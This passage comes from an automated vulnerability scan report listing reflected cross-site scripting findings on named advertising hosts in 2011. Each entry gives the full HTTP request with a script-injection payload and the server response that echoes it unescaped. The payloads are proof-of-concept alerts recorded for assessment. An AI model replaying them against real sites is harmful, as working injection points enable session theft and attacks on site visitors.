4.283. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/html-elements.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/themes/zen/zen/html-elements.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6638"><script>alert(1)</script>1169c57b8de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesd6638"><script>alert(1)</script>1169c57b8de/all/themes/zen/zen/html-elements.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:39:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:39:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/sitesd6638"><script>alert(1)</script>1169c57b8de/all/themes/zen/zen/html-elements.css?7" />
...[SNIP]...
4.284. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/html-elements.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/themes/zen/zen/html-elements.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5abd4"-alert(1)-"92d6a05714f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites5abd4"-alert(1)-"92d6a05714f/all/themes/zen/zen/html-elements.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:39:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:39:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/sites5abd4"-alert(1)-"92d6a05714f/all/themes/zen/zen/html-elements.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilt
...[SNIP]...
4.285. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/tabs.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/themes/zen/zen/tabs.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6275"-alert(1)-"e38e5e142f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitese6275"-alert(1)-"e38e5e142f7/all/themes/zen/zen/tabs.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/sitese6275"-alert(1)-"e38e5e142f7/all/themes/zen/zen/tabs.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="java
...[SNIP]...
4.286. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/tabs.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/themes/zen/zen/tabs.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 153e5"><script>alert(1)</script>538bdcd44fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites153e5"><script>alert(1)</script>538bdcd44fb/all/themes/zen/zen/tabs.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/sites153e5"><script>alert(1)</script>538bdcd44fb/all/themes/zen/zen/tabs.css?7" />
...[SNIP]...
4.287. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e956f"><script>alert(1)</script>9b559897d8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naie956f"><script>alert(1)</script>9b559897d8a/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E6EB92B6E651A4418BD90FFF001EBEA; atdses=O

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.tacoda.at.atwola.com/naie956f"><script>alert(1)</script>9b559897d8a/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.288. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5505b"-alert(1)-"4569422c6c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai5505b"-alert(1)-"4569422c6c6/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E6EB92B6E651A4418BD90FFF001EBEA; atdses=O

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:36 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai5505b"-alert(1)-"4569422c6c6/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...
4.289. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c95a4"-alert(1)-"b349cd28e21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpc95a4"-alert(1)-"b349cd28e21?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E6EB92B6E651A4418BD90FFF001EBEA; atdses=O

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:48 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpc95a4"-alert(1)-"b349cd28e21?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...
4.290. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92e80"><script>alert(1)</script>dad2dbfc62d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.php92e80"><script>alert(1)</script>dad2dbfc62d?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E6EB92B6E651A4418BD90FFF001EBEA; atdses=O

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.tacoda.at.atwola.com/nai/daa.php92e80"><script>alert(1)</script>dad2dbfc62d?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.291. http://pixel.adsafeprotected.com/jspix [anId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 735ee"-alert(1)-"1d5f551d84d was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144735ee"-alert(1)-"1d5f551d84d&pubId=24537&campId=176617 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A53D4BC0AF4F195268038C49283323ED; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:23:46 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144735ee"-alert(1)-"1d5f551d84d&pubId=24537&campId=176617",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt764nwm"
};


(function(){var O="3.13.1";var w=(adsafeVisParams.debug===
...[SNIP]...
4.292. http://pixel.adsafeprotected.com/jspix [campId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6a86"-alert(1)-"6efd7905588 was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=24537&campId=176617b6a86"-alert(1)-"6efd7905588 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FD7121AF5B312300E36F95557632867D; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:23:47 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=24537&campId=176617b6a86"-alert(1)-"6efd7905588",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt764oox"
};


(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var o=2000;var I={I
...[SNIP]...
4.293. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96d72"-alert(1)-"2acf5ac6749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=24537&campId=176617&96d72"-alert(1)-"2acf5ac6749=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=120EBAC52ECDDBACB054287271966E0C; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:23:48 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=24537&campId=176617&96d72"-alert(1)-"2acf5ac6749=1",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt764p6n"
};


(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var o=2000;var I
...[SNIP]...
4.294. http://pixel.adsafeprotected.com/jspix [pubId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd807"-alert(1)-"205675e8df7 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=24537bd807"-alert(1)-"205675e8df7&campId=176617 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7104C1DD4D5CCE303D6C58203212258F; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:23:47 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=24537bd807"-alert(1)-"205675e8df7&campId=176617",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt764o9q"
};


(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var
...[SNIP]...
